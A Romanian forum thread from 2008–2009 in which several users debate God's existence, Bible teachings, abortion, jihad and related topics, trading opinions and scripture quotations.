Idontknow:Inteleg ce spui tu si tocmai de asta nu ma consider neaparat intr-un fel, pentru ca daca exista Dumnezeu si doreste sa mi Se descopere, totul se poate intoarce la 180 de grade...daca nu, voi merge incotro imi va dicta inima sau ratiunea...Iar influentati de cineva nu pot fi decat cei care se lasa influentati...

Este foarte bine, Idontknow, dupa parerea mea, sa-ti deschizi mintea, sa cauti rational sa afli adevarurile crestine si sa incerci sa cercetezi cat mai multe teorii. Esti o pwersoana inteligenta, ai toata admiratia mea.Iti doresc succes in cautarea ta!
Si este bine ca nu te vei lasa influentata!
Si intr-o zi,sper ca Dumnezeu sa Se descopere si tie.

Raven
28.02.2008, 05:00
in primul rand nimic din raspunsul tau nu are legatura cu faptul ca Von Neumann a luat decizia cand cancerul i-a afectat creierull..
Are totul de-a face cu alegera lui von Neumann: si anume ca religia e o alegere personala care nu poate fi judecata de tine sau de mine in primul rand pt. ca noi nu suntem atotstiutori.

putea sa faca o obsesie pentru pantofi, putea sa devina violent si sa se autodistruga...cu asta ai gasit raspunsul la toate intrebarile ..daca nu-ti convinge o logica spui ca situatia nu poate fi explicata logic...momentan traim dupa logica..totul e logica...
Putea multe, ceea ce e mai putin relevant. Ce e important in final este alegerea, actiunea,. Faptele sunt mai importante ca gandurile parcate in cap.

Referitor la logica, ea sufera de cateva probleme: nu este unica, nu este consecventa si este aplicata de regula tendentios pt. ca are goluri. In filosofie, aceste aspecte ale logicii sunt luate in consideratie. Aici vorbesc despre logica(,)ca disciplina (asa cum sunt ramurile stiintei sau cele ale filosofiei sau artelor) si nu despre logica individului.

Cand se prabuseste un avion.."credinciosii "zic ..asa a vrut d-zeu..dar descoperim ca a fost o defectiune tehnica si era logic sa se pabuseasca
Si defectiunea tehnica de ce a aparut? Care cauza cauzei?
Eu nu cred in hazard, in noroc sau in ghinion. Toate evenimentele au cauzele lor care nu pot fi intotdeauna explicate.

Iti dau exemple f. simple daca esti interesat.

</span>

Constructiile de orice fel inca se construiesc dupa hard copies..pana in 90 nu se folosea reteaua si daca ai timp iti pot da mii de exemple de masterpieces...ma bucura in schimb sa observ ca gasesti inovatiile ca indispensabilesmileys/smiley2.gif
Si piramidele s-au construit fara tehnica electronica de calcul. Costul lor a inclus un numar urias de morti.
Masterpieces nevertheless.

Parca vorbeai de Autocad. Asta inseamna computer SW &amp; HW. Eu de perioada asta recenta vorbeam, de ultimii cca. 40 de ani (las la o parte ordinatoarele pe lampi).

idontknow
28.02.2008, 05:59
Draga mea am o veste proasta..extrateresti nu existahttp://www.romanian-portal.com/forum/smileys/smiley36.gif

1.Nu mi se pare o veste proasta, ci chiar foarte buna.

2.Nici eu nu cred ca exista.

3.Daca ar exista, ei nu ar putea prezice viitorul nostru, ci doar l-ar putea influenta, deci nu ar fi prestiinta.O fiinta limitata in timp si spatiu nu se poate situa in afara acestor coordonate, deci nu poate cunoaste viitorul.Asta inseamna ca un om poate preziceun anumit evenimentdoar cu ajutorul unei interventii din partea a Ceva sau Cineva care exista in afara coordonatelor spatio-temporale.Altfel, este doar inselatorie(in sensul ca daca "se implineste prezicerea", inseamna ca a fost "implinita" de catre "prezicator"smileys/smiley36.gif).

keyframe14
28.02.2008, 06:10
Sunt convins ca exista cazuri cand anumite evenimente nu pot fi explicate, inca...</span>dar cred ca esti de acord cu mine ca e o notiune de timp la mijloc...Oricare ar fi ele "divinatea" nu are nici o legatura..
Defectiunea tehnica, a aparut din cauza unei defectiuni la pompa de alimentare cu combustibil a avionului, pe fondul proastei calitati al acestuia...sa nu ma intrebi acum de ce era combustibilul prost ca nu ma joc..smileys/smiley2.gif

Sw si Hw pot lucra si arata performante fara retea..poate exista independent..nu acelasi lucru putem spune de retea...
Personal nu folosesc reteaua pt a transmite documente ..ftp nu ofera solutia legala ca persoana respectiva le-a primit si nu poti tine un track ca submittal..deci hard copies...printuri , hartie...no network..smileys/smiley1.gif

fl%rin
28.02.2008, 08:08
Raven, atentatele sinucigase au la baza credinte religioase. Nu e nimic politic in jihad, si nici in credinta celor 72 de virgine care ii asteapta pe martiri dupa moarte.
Idontknow, e normal ca fiecare sa aiba parerile proprii, inclusiv in ceea ce priveste avortul. Este adevarat, avortul nu este o solutie placuta ( nici pentru mama ), dar este totusi o solutie la care unele femei vor sa apeleze. Nu mi se pare normal ca un grup de oameni, chiar majoritar, sa impuna cu forta credinta lui altor oameni, pentru ca in El Salvador asta s-a facut, si s-ar face la fel si in USA daca ar fi dupa zelotii religiosi. Asa cum nimeni nu te poate obliga sa avortezi, mi se pare normal sa fii liber sa o si faci daca doresti. Avortul se face pana in 3 luni, fetusul neavand un sistem nervos dezvoltat. Cazul este similar cu cazurile in care oamenii sunt declarati morti daca a intervenit moartea cerebrala. Eu nu sunt de acord cu interdictiile de nici un fel, bineinteles in cazul in care nu se aduce atingere altor oameni, iar religia la asta ar duce: interdictii peste interdictii.
Suflet_solar, vrei sa iti dau niste exemple de adevarata invatatura crestina? De genul celor care iti spun sa-ti bati copiii daca nu asculta,
sa-ti omori nevasta cu pietre daca te inseala, la fel ca si pe homosexuali sau vrajitoare, sa-i omori cu pietre si pe cei care lucreaza sambata etc. Iti dau exemple concrete daca vrei. Vorbesti de Biblie si de invataturile crestine, dar nici macar nu ai citit-o.

idontknow
28.02.2008, 10:40
Idontknow, e normal ca fiecare sa aiba parerile proprii, inclusiv in ceea ce priveste avortul. Este adevarat, avortul nu este o solutie placuta ( nici pentru mama ), dar este totusi o solutie la care unele femei vor sa apeleze. Nu mi se pare normal ca un grup de oameni, chiar majoritar, sa impuna cu forta credinta lui altor oameni, pentru ca in El Salvador asta s-a facut, si s-ar face la fel si in USA daca ar fi dupa zelotii religiosi. Asa cum nimeni nu te poate obliga sa avortezi, mi se pare normal sa fii liber sa o si faci daca doresti. Avortul se face pana in 3 luni, fetusul neavand un sistem nervos dezvoltat. Cazul este similar cu cazurile in care oamenii sunt declarati morti daca a intervenit moartea cerebrala. Eu nu sunt de acord cu interdictiile de nici un fel, bineinteles in cazul in care nu se aduce atingere altor oameni, iar religia la asta ar duce: interdictii peste interdictii.

Eu mi-am exprimat opinia personala in legatura cu avortul, dar aici ai perfecta dreptate.

28.02.2008, 17:01
Florin10 : Suflet_solar, vrei sa iti dau niste exemple de adevarata invatatura crestina? De genul celor care iti spun sa-ti bati copiii daca nu asculta,
sa-ti omori nevasta cu pietre daca te inseala, la fel ca si pe homosexuali sau vrajitoare, sa-i omori cu pietre si pe cei care lucreaza sambata etc. Iti dau exemple concrete daca vrei. Vorbesti de Biblie si de invataturile crestine, dar nici macar nu ai citit-o.

Florin, mi-am facut putin timp sa caut in cuvintele, indemnurile si atitudinile lui Iisus Hristos (pentru ca exemplul Lui este cel care sta la baza credintei crestine, din cate stiu eu), ceva in legatura cu cele spuse de tine mai sus.Am deschis o Biblie Ortodoxa romaneasca, si am gasit urmatoarele:
1. El i-a iubit pe copii,spunand ca "a unora ca acestora e imparatia cerurilor.[...]Cine nu va primi imparatia lui Dumnezeu ca un copil, nu va intra in ea" (Marcu,cap 10, v.13-15)
2.Femeia care inseala(adultera) a fost aparata de Iisus si nu condamnata, prin cuvintele:" Cel fara pacat dintre voi, sa arunce primul piatra asupra ei"(Ioan, cap8, v.1-7)
3.Cu homosexualii si vrajitoarele, ar trebui, dupa indemnul lui Hristos, sa ne purtam astfel "Nu judecati, sa nu fiti judecati.[...]Cu masura cu care masurati, vi se va masura".(Matei,cap.7, v. 1-2)
4.Cat despre a lucra sambata(sau duminica, pentru crestinii ortodocsi,decretata, cum stim, de Constantin cel Mare ca zi a Domnului pentru ca Iisus Hristos a inviat duminica), El vindeca bolnavi in ziua sambetei si era condamnat de farisei, ca nu respecta legea evreiasca, si la acestea i-a intrebat "Care dintre voi, de-i va cadea fiul sau boul in fantana nu-l va scoate indata in ziua sambetei?"(Luca,cap14,v.1-5).
Am vrut sa fie cat mai scurt cu putiinta mesajul meu si nu am citat versetele in intregime, dar le-am pus in paranteza.
Si nu am facut aceasta, ca sa dovedesc, vezi Doamne, ca ia uite ce desteapta sunt eu. Am scris, pentru ca m-au durut pur si simplu cuvintele tale.

Daca am urma fiecare din invataturile lui Hristos, macar cate o mica farama, poate am reusi sa facem o lume mai buna. Si eu mi-as dori aceasta, dar nu incerc sa conving pe nimeni, de nimic. Dar nici nepasatoare n-am putut sa stau, la unele postari.
Promit insa ca nu voi mai scrie. M-am necajit destul si apoi, nu vreau sa fiu acuzata ca fac parte din vreo secta.

Si promit, Florin10, ca am sa citesc Biblia. :)

Raven
29.02.2008, 01:04
Sunt convins ca exista cazuri cand anumite evenimente nu pot fi explicate, inca...</span>dar cred ca esti de acord cu mine ca e o notiune de timp la mijloc...Oricare ar fi ele "divinatea" nu are nici o legatura..
Defectiunea tehnica, a aparut din cauza unei defectiuni la pompa de alimentare cu combustibil a avionului, pe fondul proastei calitati al acestuia...sa nu ma intrebi acum de ce era combustibilul prost ca nu ma joc..smileys/smiley2.gif
"inca" asta dureaza de cand a aparut omul si eu cred ca va mai dura inca mult de-caum incolo, poate chiar pt. totdeauna. Progresul aduce regres si invers - cum ere aia cu orice sut in *** e-un pas inainte. Dar omul nu va putea explica niciodata totul</span>, afara doar de cazul in care va atinge perfectiunea.

RE: avionul si pompa
Ba da, ba da, cum adica era combustibilul "prost" si mai ales de c e i cum de-a ajuns acolo, cauza greselii etc. Dupa cum vezi, firul se despica in mult mai multe decat in 4.

[QUOTE=keyframe14]Sw si Hw pot lucra si arata performante fara retea..poate exista independent..nu acelasi lucru putem spune de retea...
Personal nu folosesc reteaua pt a transmite documente ..ftp nu ofera solutia legala ca persoana respectiva le-a primit si nu poti tine un track ca submittal..deci hard copies...printuri , hartie...no network..smileys/smiley1.gif

Pai asta e rolul retelei, sa ineibleze comunicatia dintre sisteme de sine statatoare. Fiecare cu rolul lui.

Ia zi, cum printezi schemele alea in Autocad? Levitatia bitilor, ceva? &lt;wink&gt;

Bineinteles, ramane solutia primara: copy pe disc si trimiti discul prin serviciul postal, prin curier sau personal. Dar costa mult - si timp si bani.

Raven
29.02.2008, 01:11
Raven, atentatele sinucigase au la baza credinte religioase. Nu e nimic politic in jihad, si nici in credinta celor 72 de virgine care ii asteapta pe martiri dupa moarte.
Coane, Jihadul e folosit ca marketing si ca unealta in toate sinucigaseniile alea.
Cauza principala e alta si e f. politica: politica americana in Orientul Mijlociu care e perceputa ca mijloc de oprimare de catre arabii de-acolo.

Notiunea de Jihad este folosita ca raspuns la politica de care vorbeam mai sus, iar pe baza acestui "raspuns" s-a ajuns la terorism.

fl%rin
29.02.2008, 08:04
suflet_solar, hai sa-ti dau si eu cateva exemple. Isus a sprijinit in totalitate Vechiul Testament ( pe care de altfel vad ca il renegi, desi este parte integranta din Biblie ). Ia uite ce spune Isus:

Matei 5:18 - Caci adevarat va spun, cata vreme nu va trece cerul si pamantul, nu va trece o iota sau o frantura de slova din Lege,

Raven
29.02.2008, 08:27
Isus a sprijinit in totalitate Vechiul Testament
Nu Vechiul Testament, ci Legea "Veche". Vechiul Testament e Tora, un cumulus de carti. Legea "Veche" inseamna cele Zece Porunci.

RE: violenta
Exista si violenta pozitiva.
Exemplu artistic: Wild at Heart (al lui Lynch).
Exemplu trivial: auto-apararea (nu numai auto-apararea individuala, ci si auto-apararea societatii).

Raven, coane, gresesti.

Stiintific vorbind - e discutabil.

Dovada! Dovada! &lt;wink&gt;

idontknow
01.03.2008, 12:12
Totusi, in afara de cazurile unde e clar ca scopurile politice se ascund dupa o anumita doctrina religioasa, exista si practici ingrozitoare care se pare ca au numai temei religios(de exemplu, ingroparea de vii a femeilor care isi inseala barbatii la musulmani-eu am vazut poze si asa am inteles ca, sincera sa fiu, n-am citit Coranul si e posibil sa nu scrie asa ceva in el)....

03.03.2008, 03:45
florin10:suflet_solar, hai sa-ti dau si eu cateva exemple. Isus a sprijinit in totalitate Vechiul Testament ( pe care de altfel vad ca il renegi, desi este parte integranta din Biblie ).

Draga Florin, eu nu reneg V.T., nu stiu cum de ai inteles asa.
Iar Iisus Hristos, a sprijinit legile stramosilor lui, numai in masura in care acestea nu periclitau Legea Iubirii tuturor semenilor,cu care El a completat vechea lege, numita a talionului(esti rau cu mine, sunt rau cu tine).El a invatat sa iubim si sa iertam, nicidecum sa aruncam cu pietre.
" Ati auzit ca s-a zis:

fl%rin
03.03.2008, 19:12
suflet_solar, uite un link aici despre frumoasa ta biblie.
http://www.evilbible.com/Evil%20Bible%20Quotes.htm

04.03.2008, 03:38
Biblia nu este a mea, Florin, e a tuturor care vor s-o citeasca.Multumesc pentru link, desi prefer s-o citesc in romaneste.

V.T. e o parte din Biblie. N.T.e alta parte. Iar invataturile lui Iisus Hristos sunt pentru crestini ceea ce este soarele in randul planetelor,care exista. Daca tot nu intelegi la ce ma refer, pot sa incerc sa explic mai mult.

doru9
18.04.2008, 18:18
[QUOTE=suflet_solar]
Iar invataturile lui Iisus Hristos sunt pentru crestini ceea ce este soarele in randul planetelor,care exista.

Problema e ca soarele exista citeva secunde, raportat la cantitatea de timp care a trecut pina acuma. Adica...si invataturiile super-sfinte astazi vor face poc precum soarele in citeva "o zi ca o mie de ani?" Ce imi e cinci milioane, ce imi este o zi deci...logica lui Iisus este perfecta dar trecatoare? Si ca tot venii vorba de soare...sunt multi ai dracului ei, unde beleshti ochii e plin de sori...asa si cu invataturiile? Multe si toate bune iar sa le intelegi iti trebuie telescoape misto?

Cu tot respectul...invataturiile lui Iisus nimeni nu le stie pentru ca ochelaristii aia au editat si re-editat biblia de jde mii de ori asa ca ce avem noi acuma este...mai ti minte telefonul fara fir? Spuneai magar si dupa patru persoane ajungea troleibuz...Asa si cu Iisus...baiat bun, finut, destept cit cuprinde...ce pacat ca stim de el ce ne da astia voie sa stim...Ceausescu la fel ca pocaitii...nu iti interzicea America si ti-o dadea dar cu lingurita prin Scrinteia, deobicei numai despre incendii si rata somajului. In biblie vad la fel incendii, rata somajului, pirlitului in iad etc..cu lingurita. Deci esti deacord cu mine ca religia este minarie curata? Eram sigur ca esti hahaha, te-am trecut aici ca membru sustinator al primul grup ateist roman de peste balta.

HaymHerman
05.08.2009, 14:50
Stim mult mai mult despre Platon si cu mai multa exactitate decit despre acest Eu sint Lumina lumi.(Cred ca acest citat este preluat din teoria zeului Soare)

fl%rin
05.08.2009, 15:04
Stim mult mai mult despre Platon si cu mai multa exactitate decit despre acest Eu sint Lumina lumi.(Cred ca acest citat este preluat din teoria zeului Soare)
Si cu atat mai putine se stiu despre Yehova al tau. Ce se stie despre Isus provine din aceeasi sursa ca si cunostintele despre Yehova, adica o culegere de texte arhaice, nesustinute de nimic altceva. Dar tu, ca un fundamentalist evreu, nu o sa vezi niciodata acest lucru evident.

Loniia
05.08.2009, 15:06

HaymHerman nu stiu exact de unde este preluata expresia "Eu sunt lumina lumi"... am comvingerea ca poate fi un ghid...in ce consideram ca este in viata fiecaruia ,fara o trimitere la Soare, doar o anumita comparatie .
Pentru o crestinsa/crestin..raspunsul este simplu ,Isus !

HaymHerman
09.08.2009, 12:56
Soarele este lumina lumi,indiferent ca este omul crestin ,budist sau evreu.
Cu ce lumineaza Isus pe un om ,daca el nu se lumineaza singur di Biblie?

HaymHerman
09.08.2009, 14:39
Si cu atat mai putine se stiu despre Yehova al tau. Ce se stie despre Isus provine din aceeasi sursa ca si cunostintele despre Yehova, adica o culegere de texte arhaice, nesustinute de nimic altceva. Dar tu, ca un fundamentalist evreu, nu o sa vezi niciodata acest lucru evident.
.................................................. ..............................................
Te consider om cult,si nu reneg inca, dar sa ma consideri pe mine fundamentalist evreu ,asta dovedeste ca inca i-ti lipseste mult.
Poate gresesc ,si bine ar fi.
Eu nu am incercat sa ti demonstrez pe orice cale ca Dumnezeul nostru exista sau nu.E treaba fiecaruia sa creada sau nu,evrei nu impun nimanui ca Dumnezeu exista.Noi avem alte argumente si le oferim doar celor ce cauta.
Existenta Israelului dupa 2555 de ani de surghiun ,nu ti spune nimic?
Sigur ca nu.ca nici nu ai incercat sa intelegi.
Nu ai nici motive.Eu i ti dau totusi un exemplu.In 588 I E N,sa darimat primul templu si Ierusalimul a mers in robie .In cartea Daniel este scris ca robia asta va dura 7 ani de ani.A fost eliberat ierusalimul in 1967.
1967+588=2555....2555:365=7.
Nu stiu daca tie i-ti spun ceva aceste cifrecare au fost scrise de peste 2000 de ani.Dar multi istorici i-si bat capul ,cum de sau implinit intocmai ,chiar daca puterile lumi sau impotrivit la maxim.
Nu are importanta ce raspuns voi primi.

Loniia
10.08.2009, 14:01
Cu ce lumineaza Isus pe un om ,daca el nu se lumineaza singur di Biblie?

Parerea ta este sa ne luminam din Biblie ?da ne luminam cei care si dorim acesta luminare ,cunoscand invatamintele din Biblie .Pe Isus il numesc astfel "lumina lumii" deoarece a facut posibila aparitia crestinitatii apropiind pe om de Creator ,prin daruirea Iubirii/Luminii .
Isus=Iubire=Lumina.

HaymHerman
11.08.2009, 15:54
Inainte de Isus nu a fost iubire?Inca Moise a spus Sa iubesti pe Domnul Dumnezeul tau din tot sufletul tau si cu toata puterea ta.
Ce a adus Isus nou in lume?Iar crestinismul nu porneste de la Isus.Isus nu a auzit niciodata de Cristos ,si nici nu la cunoscut.Acest personaj fictiv a aparut prin Roma la mult timp dupa Isus.Asta poti sa afli doar daca esti sincer cu tine.

Loniia
12.08.2009, 00:29
Inainte de Isus nu a fost iubire?Inca Moise a spus Sa iubesti pe Domnul Dumnezeul tau din tot sufletul tau si cu toata puterea ta.
Ce a adus Isus nou in lume?Iar crestinismul nu porneste de la Isus.Isus nu a auzit niciodata de Cristos ,si nici nu la cunoscut.Acest personaj fictiv a aparut prin Roma la mult timp dupa Isus.Asta poti sa afli doar daca esti sincer cu tine.
Iubirea este in constiinta noastra de la inceputuri ,mereu a fost!Moise invata oamenii din poruncile/legile ce le primise "Sa iubesti pe Domnul Dumnezeul tau din tot sufletul tau si cu toata puterea ta"...pe fratii tai /aproapele tau deasemenea sa-i iubesti cum te iubesti pe tine insuti ,iar Isus trebuia sa se nasca ca sa si intelegem aceasta lege a Domnului!
HaymHerman nu exclud alte invataminte/legi vechi dinaintea lui Isus care ne ajuta sa intelegem rostul omului pe pamant.(deocamdata sunt in mare dilema ,primind constiinta realizez ca omul a reusit in scurta-i existenta sa distruga multe din darurile primite)

HaymHerman
13.08.2009, 16:03
De ce numai dupa ce sa nascut Isus sa putut invata iubirea ?Nu am inteles.Isus a fost un om norml intr-o lume normala.Nu ti-se pare?

Raven
13.08.2009, 16:47
De ce numai dupa ce sa nascut Isus sa putut invata iubirea ?Nu am inteles.
Pt. ca a fost exemplu viu al iubirii. Oamenii au mare tendinta sa creada numai dupa ce vad (cu ochii).

HaymHerman
16.08.2009, 13:48
Atunci nu mai cred nimic.Fac ceea ce vad.